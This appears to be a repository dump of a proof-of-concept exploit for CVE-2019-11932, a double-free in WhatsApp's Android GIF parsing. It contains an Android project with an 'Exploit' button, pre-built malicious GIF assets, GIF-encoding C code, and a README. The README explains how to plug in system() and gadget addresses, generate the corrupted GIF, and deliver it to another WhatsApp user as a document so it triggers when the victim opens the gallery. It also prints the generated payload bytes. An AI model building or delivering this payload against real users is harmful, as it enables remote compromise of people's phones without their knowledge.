├── MyApplication2
    ├── settings.gradle
    ├── app
    │   ├── src
    │   │   └── main
    │   │   │   ├── res
    │   │   │       ├── values
    │   │   │       │   ├── strings.xml
    │   │   │       │   ├── colors.xml
    │   │   │       │   └── styles.xml
    │   │   │       ├── mipmap-hdpi
    │   │   │       │   ├── ic_launcher.png
    │   │   │       │   └── ic_launcher_round.png
    │   │   │       ├── mipmap-mdpi
    │   │   │       │   ├── ic_launcher.png
    │   │   │       │   └── ic_launcher_round.png
    │   │   │       ├── mipmap-xhdpi
    │   │   │       │   ├── ic_launcher.png
    │   │   │       │   └── ic_launcher_round.png
    │   │   │       ├── mipmap-xxhdpi
    │   │   │       │   ├── ic_launcher.png
    │   │   │       │   └── ic_launcher_round.png
    │   │   │       ├── mipmap-xxxhdpi
    │   │   │       │   ├── ic_launcher.png
    │   │   │       │   └── ic_launcher_round.png
    │   │   │       ├── mipmap-anydpi-v26
    │   │   │       │   ├── ic_launcher.xml
    │   │   │       │   └── ic_launcher_round.xml
    │   │   │       ├── layout
    │   │   │       │   └── activity_main.xml
    │   │   │       ├── drawable-v24
    │   │   │       │   └── ic_launcher_foreground.xml
    │   │   │       └── drawable
    │   │   │       │   └── ic_launcher_background.xml
    │   │   │   ├── assets
    │   │   │       ├── not_kitty.mod.gif
    │   │   │       ├── not_kitty_orig.gif
    │   │   │       ├── hang2.double-free.gif
    │   │   │       ├── not_kitty.double-free.arm64.gif
    │   │   │       └── not_kitty.double-free.armv7.gif
    │   │   │   ├── AndroidManifest.xml
    │   │   │   ├── cpp
    │   │   │       └── gif
    │   │   │       │   ├── egif_lib.c
    │   │   │       │   ├── gif_lib.h
    │   │   │       │   └── exploit.c
    │   │   │   └── java
    │   │   │       └── com
    │   │   │           └── example
    │   │   │               └── myapplication
    │   │   │                   └── MainActivity.java
    │   ├── CMakeLists.txt
    │   ├── proguard-rules.pro
    │   ├── build.gradle
    │   └── app.iml
    ├── gradle
    │   └── wrapper
    │   │   ├── gradle-wrapper.jar
    │   │   └── gradle-wrapper.properties
    ├── local.properties
    ├── build.gradle
    ├── gradle.properties
    ├── MyApplication2.iml
    ├── gradlew.bat
    └── gradlew
├── Makefile
├── README.md
├── egif_lib.c
├── exploit.c
└── gif_lib.h


/MyApplication2/settings.gradle:
--------------------------------------------------------------------------------
1 | include ':app'
2 | 


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | all:
2 | 	gcc -o exploit egif_lib.c exploit.c
3 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/values/strings.xml:
--------------------------------------------------------------------------------
1 | <resources>
2 |     <string name="app_name">My Application</string>
3 | </resources>
4 | 


--------------------------------------------------------------------------------
/MyApplication2/gradle/wrapper/gradle-wrapper.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/gradle/wrapper/gradle-wrapper.jar


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/assets/not_kitty.mod.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/assets/not_kitty.mod.gif


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/assets/not_kitty_orig.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/assets/not_kitty_orig.gif


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/assets/hang2.double-free.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/assets/hang2.double-free.gif


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-hdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-hdpi/ic_launcher.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-mdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-mdpi/ic_launcher.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-xhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-xhdpi/ic_launcher.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-xxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-xxhdpi/ic_launcher.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-xxxhdpi/ic_launcher.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/assets/not_kitty.double-free.arm64.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/assets/not_kitty.double-free.arm64.gif


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/assets/not_kitty.double-free.armv7.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/assets/not_kitty.double-free.armv7.gif


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-hdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-hdpi/ic_launcher_round.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-mdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-mdpi/ic_launcher_round.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-xhdpi/ic_launcher_round.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AshuJaiswal109/CVE-2019-11932/HEAD/MyApplication2/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.png


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/values/colors.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <resources>
3 |     <color name="colorPrimary">#3F51B5</color>
4 |     <color name="colorPrimaryDark">#303F9F</color>
5 |     <color name="colorAccent">#FF4081</color>
6 | </resources>
7 | 


--------------------------------------------------------------------------------
/MyApplication2/gradle/wrapper/gradle-wrapper.properties:
--------------------------------------------------------------------------------
1 | #Sat Oct 12 08:09:12 SGT 2019
2 | distributionBase=GRADLE_USER_HOME
3 | distributionPath=wrapper/dists
4 | zipStoreBase=GRADLE_USER_HOME
5 | zipStorePath=wrapper/dists
6 | distributionUrl=https\://services.gradle.org/distributions/gradle-5.4.1-all.zip
7 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-anydpi-v26/ic_launcher.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
3 |     <background android:drawable="@drawable/ic_launcher_background" />
4 |     <foreground android:drawable="@drawable/ic_launcher_foreground" />
5 | </adaptive-icon>


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/mipmap-anydpi-v26/ic_launcher_round.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <adaptive-icon xmlns:android="http://schemas.android.com/apk/res/android">
3 |     <background android:drawable="@drawable/ic_launcher_background" />
4 |     <foreground android:drawable="@drawable/ic_launcher_foreground" />
5 | </adaptive-icon>


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/values/styles.xml:
--------------------------------------------------------------------------------
 1 | <resources>
 2 | 
 3 |     <!-- Base application theme. -->
 4 |     <style name="AppTheme" parent="Theme.AppCompat.Light.DarkActionBar">
 5 |         <!-- Customize your theme here. -->
 6 |         <item name="colorPrimary">@color/colorPrimary</item>
 7 |         <item name="colorPrimaryDark">@color/colorPrimaryDark</item>
 8 |         <item name="colorAccent">@color/colorAccent</item>
 9 |     </style>
10 | 
11 | </resources>
12 | 


--------------------------------------------------------------------------------
/MyApplication2/local.properties:
--------------------------------------------------------------------------------
 1 | ## This file must *NOT* be checked into Version Control Systems,
 2 | # as it contains information specific to your local configuration.
 3 | #
 4 | # Location of the SDK. This is only used by Gradle.
 5 | # For customization when using a Version Control System, please read the
 6 | # header note.
 7 | #Sat Oct 12 07:33:23 SGT 2019
 8 | ndk.dir=C\:\\Users\\Awakened\\AppData\\Local\\Android\\Sdk\\ndk\\20.0.5594570
 9 | sdk.dir=C\:\\Users\\Awakened\\AppData\\Local\\Android\\Sdk
10 | 


--------------------------------------------------------------------------------
/MyApplication2/build.gradle:
--------------------------------------------------------------------------------
 1 | // Top-level build file where you can add configuration options common to all sub-projects/modules.
 2 | 
 3 | buildscript {
 4 |     
 5 |     repositories {
 6 |         google()
 7 |         jcenter()
 8 |     }
 9 |     dependencies {
10 |         classpath 'com.android.tools.build:gradle:3.5.0'
11 |     }
12 | }
13 | 
14 | allprojects {
15 |     repositories {
16 |         google()
17 |         jcenter()
18 |     }
19 | }
20 | 
21 | task clean(type: Delete) {
22 |     delete rootProject.buildDir
23 | }
24 | 


--------------------------------------------------------------------------------
/MyApplication2/app/CMakeLists.txt:
--------------------------------------------------------------------------------
 1 | cmake_minimum_required(VERSION 3.4.1)
 2 | 
 3 | #SET (CMAKE_CXX_FLAGS "${CMAKE_CXX_FLAGS} -O0 -g -fsanitize=address -fno-omit-frame-pointer")
 4 | #SET (CMAKE_C_FLAGS "${CMAKE_C_FLAGS} -O0 -g -fsanitize=address -fno-omit-frame-pointer")
 5 | #SET (CMAKE_SHARED_LINKER_FLAGS "${CMAKE_SHARED_LINKER_FLAGS} -fsanitize=address")
 6 | 
 7 | set(CMAKE_VERBOSE_MAKEFILE on)
 8 | 
 9 | # gif
10 | set(SOURCES)
11 | file(GLOB_RECURSE SOURCES src/main/cpp/gif/*.c)
12 | 
13 | add_library(pl_droidsonroids_gif SHARED ${SOURCES})
14 | 
15 | set(LIBS)
16 | list(APPEND LIBS
17 |         jnigraphics
18 |         android
19 |         GLESv2
20 |         log
21 |         )
22 | 
23 | target_link_libraries(pl_droidsonroids_gif ${LIBS})
24 | 


--------------------------------------------------------------------------------
/MyApplication2/gradle.properties:
--------------------------------------------------------------------------------
 1 | # Project-wide Gradle settings.
 2 | # IDE (e.g. Android Studio) users:
 3 | # Gradle settings configured through the IDE *will override*
 4 | # any settings specified in this file.
 5 | # For more details on how to configure your build environment visit
 6 | # http://www.gradle.org/docs/current/userguide/build_environment.html
 7 | # Specifies the JVM arguments used for the daemon process.
 8 | # The setting is particularly useful for tweaking memory settings.
 9 | org.gradle.jvmargs=-Xmx1536m
10 | # When configured, Gradle will run in incubating parallel mode.
11 | # This option should only be used with decoupled projects. More details, visit
12 | # http://www.gradle.org/docs/current/userguide/multi_project_builds.html#sec:decoupled_projects
13 | # org.gradle.parallel=true
14 | 


--------------------------------------------------------------------------------
/MyApplication2/app/proguard-rules.pro:
--------------------------------------------------------------------------------
 1 | # Add project specific ProGuard rules here.
 2 | # You can control the set of applied configuration files using the
 3 | # proguardFiles setting in build.gradle.
 4 | #
 5 | # For more details, see
 6 | #   http://developer.android.com/guide/developing/tools/proguard.html
 7 | 
 8 | # If your project uses WebView with JS, uncomment the following
 9 | # and specify the fully qualified class name to the JavaScript interface
10 | # class:
11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview {
12 | #   public *;
13 | #}
14 | 
15 | # Uncomment this to preserve the line number information for
16 | # debugging stack traces.
17 | #-keepattributes SourceFile,LineNumberTable
18 | 
19 | # If you keep the line number information, uncomment this to
20 | # hide the original source file name.
21 | #-renamesourcefileattribute SourceFile
22 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/layout/activity_main.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <android.support.constraint.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
 3 |     xmlns:app="http://schemas.android.com/apk/res-auto"
 4 |     xmlns:tools="http://schemas.android.com/tools"
 5 |     android:layout_width="match_parent"
 6 |     android:layout_height="match_parent"
 7 |     tools:context=".MainActivity">
 8 | 
 9 |     <Button
10 |         android:id="@+id/exploit"
11 |         android:layout_width="wrap_content"
12 |         android:layout_height="wrap_content"
13 |         android:text="Exploit"
14 |         app:layout_constraintBottom_toBottomOf="parent"
15 |         app:layout_constraintLeft_toLeftOf="parent"
16 |         app:layout_constraintRight_toRightOf="parent"
17 |         app:layout_constraintTop_toTopOf="parent" />
18 | 
19 | </android.support.constraint.ConstraintLayout>


--------------------------------------------------------------------------------
/MyApplication2/MyApplication2.iml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <module external.linked.project.id="MyApplication2" external.linked.project.path="$MODULE_DIR$" external.root.project.path="$MODULE_DIR$" external.system.id="GRADLE" type="JAVA_MODULE" version="4">
 3 |   <component name="FacetManager">
 4 |     <facet type="java-gradle" name="Java-Gradle">
 5 |       <configuration>
 6 |         <option name="BUILD_FOLDER_PATH" value="$MODULE_DIR$/build" />
 7 |         <option name="BUILDABLE" value="false" />
 8 |       </configuration>
 9 |     </facet>
10 |   </component>
11 |   <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_7" inherit-compiler-output="true">
12 |     <exclude-output />
13 |     <content url="file://$MODULE_DIR$">
14 |       <excludeFolder url="file://$MODULE_DIR$/.gradle" />
15 |     </content>
16 |     <orderEntry type="inheritedJdk" />
17 |     <orderEntry type="sourceFolder" forTests="false" />
18 |   </component>
19 | </module>


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/AndroidManifest.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <manifest xmlns:android="http://schemas.android.com/apk/res/android"
 3 |     package="com.example.myapplication">
 4 | 
 5 |     <application
 6 |         android:allowBackup="true"
 7 |         android:icon="@mipmap/ic_launcher"
 8 |         android:label="@string/app_name"
 9 |         android:roundIcon="@mipmap/ic_launcher_round"
10 |         android:supportsRtl="true"
11 |         android:theme="@style/AppTheme">
12 |         <activity android:name=".MainActivity">
13 |             <intent-filter>
14 |                 <action android:name="android.intent.action.MAIN" />
15 | 
16 |                 <category android:name="android.intent.category.LAUNCHER" />
17 |             </intent-filter>
18 |         </activity>
19 |     </application>
20 |     <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
21 |     <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
22 | 
23 | </manifest>


--------------------------------------------------------------------------------
/MyApplication2/app/build.gradle:
--------------------------------------------------------------------------------
 1 | apply plugin: 'com.android.application'
 2 | 
 3 | android {
 4 |     compileSdkVersion 28
 5 |     defaultConfig {
 6 |         applicationId "com.example.myapplication"
 7 |         minSdkVersion 23
 8 |         targetSdkVersion 28
 9 |         versionCode 1
10 |         versionName "1.0"
11 |         testInstrumentationRunner "android.support.test.runner.AndroidJUnitRunner"
12 |         externalNativeBuild {
13 |             cmake {
14 | //                abiFilters "armeabi-v7a"
15 |                 abiFilters "arm64-v8a"
16 |             }
17 |         }
18 |     }
19 |     sourceSets {
20 |         main {
21 |             // let gradle pack the shared library into apk
22 |             jniLibs.srcDirs = ['libs']
23 |         }
24 |     }
25 |     buildTypes {
26 |         release {
27 |             minifyEnabled false
28 |             proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro'
29 |         }
30 |     }
31 |     externalNativeBuild {
32 |         cmake {
33 |             path "CMakeLists.txt"
34 |         }
35 |     }
36 | }
37 | 
38 | dependencies {
39 |     implementation fileTree(dir: 'libs', include: ['*.jar'])
40 |     implementation 'com.android.support:appcompat-v7:28.0.0-rc01'
41 |     implementation 'com.android.support.constraint:constraint-layout:1.1.2'
42 |     testImplementation 'junit:junit:4.12'
43 |     androidTestImplementation 'com.android.support.test:runner:1.0.2'
44 |     androidTestImplementation 'com.android.support.test.espresso:espresso-core:3.0.2'
45 | }
46 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2019-11932
 2 | 
 3 | The address of system() and the gadget must be replaced by the actual address found by an information disclosure vulnerability.
 4 | 
 5 | After replacing address of system() and gadget. Run the code to generate the corrupted GIF file:
 6 | 
 7 | ```
 8 | notroot@osboxes:~/Desktop/gif$ make
 9 | .....
10 | .....
11 | .....
12 | notroot@osboxes:~/Desktop/gif$ ./exploit exploit.gif
13 | buffer = 0x7ffc586cd8b0 size = 266
14 | 47 49 46 38 39 61 18 00 0A 00 F2 00 00 66 CC CC
15 | FF FF FF 00 00 00 33 99 66 99 FF CC 00 00 00 00
16 | 00 00 00 00 00 2C 00 00 00 00 08 00 15 00 00 08
17 | 9C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
18 | 00 00 00 00 00 00 00 00 00 00 00 00 84 9C 09 B0
19 | C5 07 00 00 00 74 DE E4 11 F3 06 0F 08 37 63 40
20 | C4 C8 21 C3 45 0C 1B 38 5C C8 70 71 43 06 08 1A
21 | 34 68 D0 00 C1 07 C4 1C 34 00 00 00 00 00 00 00
22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
23 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
26 | 00 54 12 7C C0 C5 07 00 00 00 EE FF FF 2C 00 00
27 | 00 00 1C 0F 00 00 00 00 2C 00 00 00 00 1C 0F 00
28 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
29 | 00 00 00 00 00 00 00 00 00 00 00 2C 00 00 00 00
30 | 18 00 0A 00 0F 00 01 00 00 3B
31 | ```
32 | 
33 | Then copy exploit.gif file and send it as Document with WhatsApp to another WhatsApp user. Take note that it must not be sent as a Media file, otherwise WhatsApp tries to convert it into an MP4 before sending. Upon the user receives the malicous GIF file, nothing will happen until the user open WhatsApp Gallery to send a media file to his/her friend.
34 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/res/drawable-v24/ic_launcher_foreground.xml:
--------------------------------------------------------------------------------
 1 | <vector xmlns:android="http://schemas.android.com/apk/res/android"
 2 |     xmlns:aapt="http://schemas.android.com/aapt"
 3 |     android:width="108dp"
 4 |     android:height="108dp"
 5 |     android:viewportHeight="108"
 6 |     android:viewportWidth="108">
 7 |     <path
 8 |         android:fillType="evenOdd"
 9 |         android:pathData="M32,64C32,64 38.39,52.99 44.13,50.95C51.37,48.37 70.14,49.57 70.14,49.57L108.26,87.69L108,109.01L75.97,107.97L32,64Z"
10 |         android:strokeColor="#00000000"
11 |         android:strokeWidth="1">
12 |         <aapt:attr name="android:fillColor">
13 |             <gradient
14 |                 android:endX="78.5885"
15 |                 android:endY="90.9159"
16 |                 android:startX="48.7653"
17 |                 android:startY="61.0927"
18 |                 android:type="linear">
19 |                 <item
20 |                     android:color="#44000000"
21 |                     android:offset="0.0" />
22 |                 <item
23 |                     android:color="#00000000"
24 |                     android:offset="1.0" />
25 |             </gradient>
26 |         </aapt:attr>
27 |     </path>
28 |     <path
29 |         android:fillColor="#FFFFFF"
30 |         android:fillType="nonZero"
31 |         android:pathData="M66.94,46.02L66.94,46.02C72.44,50.07 76,56.61 76,64L32,64C32,56.61 35.56,50.11 40.98,46.06L36.18,41.19C35.45,40.45 35.45,39.3 36.18,38.56C36.91,37.81 38.05,37.81 38.78,38.56L44.25,44.05C47.18,42.57 50.48,41.71 54,41.71C57.48,41.71 60.78,42.57 63.68,44.05L69.11,38.56C69.84,37.81 70.98,37.81 71.71,38.56C72.44,39.3 72.44,40.45 71.71,41.19L66.94,46.02ZM62.94,56.92C64.08,56.92 65,56.01 65,54.88C65,53.76 64.08,52.85 62.94,52.85C61.8,52.85 60.88,53.76 60.88,54.88C60.88,56.01 61.8,56.92 62.94,56.92ZM45.06,56.92C46.2,56.92 47.13,56.01 47.13,54.88C47.13,53.76 46.2,52.85 45.06,52.85C43.92,52.85 43,53.76 43,54.88C43,56.01 43.92,56.92 45.06,56.92Z"
32 |         android:strokeColor="#00000000"
33 |         android:strokeWidth="1" />
34 | </vector>
35 | 


--------------------------------------------------------------------------------
/MyApplication2/gradlew.bat:
--------------------------------------------------------------------------------
 1 | @if "%DEBUG%" == "" @echo off
 2 | @rem ##########################################################################
 3 | @rem
 4 | @rem  Gradle startup script for Windows
 5 | @rem
 6 | @rem ##########################################################################
 7 | 
 8 | @rem Set local scope for the variables with windows NT shell
 9 | if "%OS%"=="Windows_NT" setlocal
10 | 
11 | set DIRNAME=%~dp0
12 | if "%DIRNAME%" == "" set DIRNAME=.
13 | set APP_BASE_NAME=%~n0
14 | set APP_HOME=%DIRNAME%
15 | 
16 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script.
17 | set DEFAULT_JVM_OPTS=
18 | 
19 | @rem Find java.exe
20 | if defined JAVA_HOME goto findJavaFromJavaHome
21 | 
22 | set JAVA_EXE=java.exe
23 | %JAVA_EXE% -version >NUL 2>&1
24 | if "%ERRORLEVEL%" == "0" goto init
25 | 
26 | echo.
27 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH.
28 | echo.
29 | echo Please set the JAVA_HOME variable in your environment to match the
30 | echo location of your Java installation.
31 | 
32 | goto fail
33 | 
34 | :findJavaFromJavaHome
35 | set JAVA_HOME=%JAVA_HOME:"=%
36 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe
37 | 
38 | if exist "%JAVA_EXE%" goto init
39 | 
40 | echo.
41 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME%
42 | echo.
43 | echo Please set the JAVA_HOME variable in your environment to match the
44 | echo location of your Java installation.
45 | 
46 | goto fail
47 | 
48 | :init
49 | @rem Get command-line arguments, handling Windows variants
50 | 
51 | if not "%OS%" == "Windows_NT" goto win9xME_args
52 | 
53 | :win9xME_args
54 | @rem Slurp the command line arguments.
55 | set CMD_LINE_ARGS=
56 | set _SKIP=2
57 | 
58 | :win9xME_args_slurp
59 | if "x%~1" == "x" goto execute
60 | 
61 | set CMD_LINE_ARGS=%*
62 | 
63 | :execute
64 | @rem Setup the command line
65 | 
66 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar
67 | 
68 | @rem Execute Gradle
69 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS%
70 | 
71 | :end
72 | @rem End local scope for the variables with windows NT shell
73 | if "%ERRORLEVEL%"=="0" goto mainEnd
74 | 
75 | :fail
76 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of
77 | rem the _cmd.exe /c_ return code!
78 | if  not "" == "%GRADLE_EXIT_CONSOLE%" exit 1
79 | exit /b 1
80 | 
81 | :mainEnd
82 | if "%OS%"=="Windows_NT" endlocal
83 | 
84 | :omega
85 | 


--------------------------------------------------------------------------------
/egif_lib.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include "gif_lib.h"
  6 | 
  7 | static int EGifBufferedOutput(GifFilePrivateType *Private, int c) {
  8 |     Private->Buf[0] = 0;
  9 |     Private->Buf[++(Private->Buf[0])] = c;
 10 |     Private->OutBuf[Private->OutBufLen++] = c;
 11 |     return GIF_OK;
 12 | }
 13 | 
 14 | static int EGifCompressOutput(GifFilePrivateType *Private, const int Code)
 15 | {
 16 |     int retval = GIF_OK;
 17 | 
 18 |     if (Code == FLUSH_OUTPUT) {
 19 |         while (Private->CrntShiftState > 0) {
 20 |             /* Get Rid of what is left in DWord, and flush it. */
 21 |             if (EGifBufferedOutput(Private, Private->CrntShiftDWord & 0xff) == GIF_ERROR)
 22 |                 retval = GIF_ERROR;
 23 |             Private->CrntShiftDWord >>= 8;
 24 |             Private->CrntShiftState -= 8;
 25 |         }
 26 |         Private->CrntShiftState = 0;    /* For next time. */
 27 |         if (EGifBufferedOutput(Private, FLUSH_OUTPUT) == GIF_ERROR)
 28 |             retval = GIF_ERROR;
 29 |     } else {
 30 |         Private->CrntShiftDWord |= ((long)Code) << Private->CrntShiftState;
 31 |         Private->CrntShiftState += Private->RunningBits;
 32 |         while (Private->CrntShiftState >= 8) {
 33 |             /* Dump out full bytes: */
 34 |             if (EGifBufferedOutput(Private, Private->CrntShiftDWord & 0xff) == GIF_ERROR)
 35 |                 retval = GIF_ERROR;
 36 |             Private->CrntShiftDWord >>= 8;
 37 |             Private->CrntShiftState -= 8;
 38 |         }
 39 |     }
 40 | 
 41 |     /* If code cannt fit into RunningBits bits, must raise its size. Note */
 42 |     /* however that codes above 4095 are used for special signaling.      */
 43 |     if (Private->RunningCode >= Private->MaxCode1 && Code <= 4095) {
 44 |         Private->MaxCode1 = 1 << ++Private->RunningBits;
 45 |     }
 46 | 
 47 |     return retval;
 48 | }
 49 | 
 50 | int EGifCompressLine(GifFilePrivateType *Private, unsigned char *Line, const int LineLen)
 51 | {
 52 |     int i = 0, CrntCode, NewCode;
 53 |     unsigned long NewKey;
 54 |     GifPixelType Pixel;
 55 | 
 56 |     if (Private->CrntCode == FIRST_CODE)    /* Its first time! */
 57 |         CrntCode = Line[i++];
 58 |     else
 59 |         CrntCode = Private->CrntCode;    /* Get last code in compression. */
 60 | 
 61 |     while (i < LineLen) {   /* Decode LineLen items. */
 62 |         Pixel = Line[i++];  /* Get next pixel from stream. */
 63 | 
 64 |         if (EGifCompressOutput(Private, CrntCode) == GIF_ERROR) {
 65 |             return GIF_ERROR;
 66 |         }
 67 |         CrntCode = Pixel;
 68 | 
 69 |         /* If however the HashTable if full, we send a clear first and
 70 |          * Clear the hash table.
 71 |          */
 72 |         if (Private->RunningCode >= LZ_MAX_CODE) {
 73 |             /* Time to do some clearance: */
 74 |             if (EGifCompressOutput(Private, Private->ClearCode)
 75 |                 == GIF_ERROR) {
 76 |                 return GIF_ERROR;
 77 |             }
 78 |             Private->RunningCode = Private->EOFCode + 1;
 79 |             Private->RunningBits = Private->BitsPerPixel + 1;
 80 |             Private->MaxCode1 = 1 << Private->RunningBits;
 81 |         }
 82 | 
 83 |     }
 84 | 
 85 |     /* Preserve the current state of the compression algorithm: */
 86 |     Private->CrntCode = CrntCode;
 87 | 
 88 |     if (Private->PixelCount == 0) {
 89 |         /* We are done - output last Code and flush output buffers: */
 90 |         if (EGifCompressOutput(Private, CrntCode) == GIF_ERROR) {
 91 |             return GIF_ERROR;
 92 |         }
 93 |         if (EGifCompressOutput(Private, Private->EOFCode) == GIF_ERROR) {
 94 |             return GIF_ERROR;
 95 |         }
 96 |         if (EGifCompressOutput(Private, FLUSH_OUTPUT) == GIF_ERROR) {
 97 |             return GIF_ERROR;
 98 |         }
 99 |     }
100 | 
101 |     return GIF_OK;
102 | }
103 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/cpp/gif/egif_lib.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include "gif_lib.h"
  6 | 
  7 | static int EGifBufferedOutput(GifFilePrivateType *Private, int c) {
  8 |     Private->Buf[0] = 0;
  9 |     Private->Buf[++(Private->Buf[0])] = c;
 10 |     Private->OutBuf[Private->OutBufLen++] = c;
 11 |     return GIF_OK;
 12 | }
 13 | 
 14 | static int EGifCompressOutput(GifFilePrivateType *Private, const int Code)
 15 | {
 16 |     int retval = GIF_OK;
 17 | 
 18 |     if (Code == FLUSH_OUTPUT) {
 19 |         while (Private->CrntShiftState > 0) {
 20 |             /* Get Rid of what is left in DWord, and flush it. */
 21 |             if (EGifBufferedOutput(Private, Private->CrntShiftDWord & 0xff) == GIF_ERROR)
 22 |                 retval = GIF_ERROR;
 23 |             Private->CrntShiftDWord >>= 8;
 24 |             Private->CrntShiftState -= 8;
 25 |         }
 26 |         Private->CrntShiftState = 0;    /* For next time. */
 27 |         if (EGifBufferedOutput(Private, FLUSH_OUTPUT) == GIF_ERROR)
 28 |             retval = GIF_ERROR;
 29 |     } else {
 30 |         Private->CrntShiftDWord |= ((long)Code) << Private->CrntShiftState;
 31 |         Private->CrntShiftState += Private->RunningBits;
 32 |         while (Private->CrntShiftState >= 8) {
 33 |             /* Dump out full bytes: */
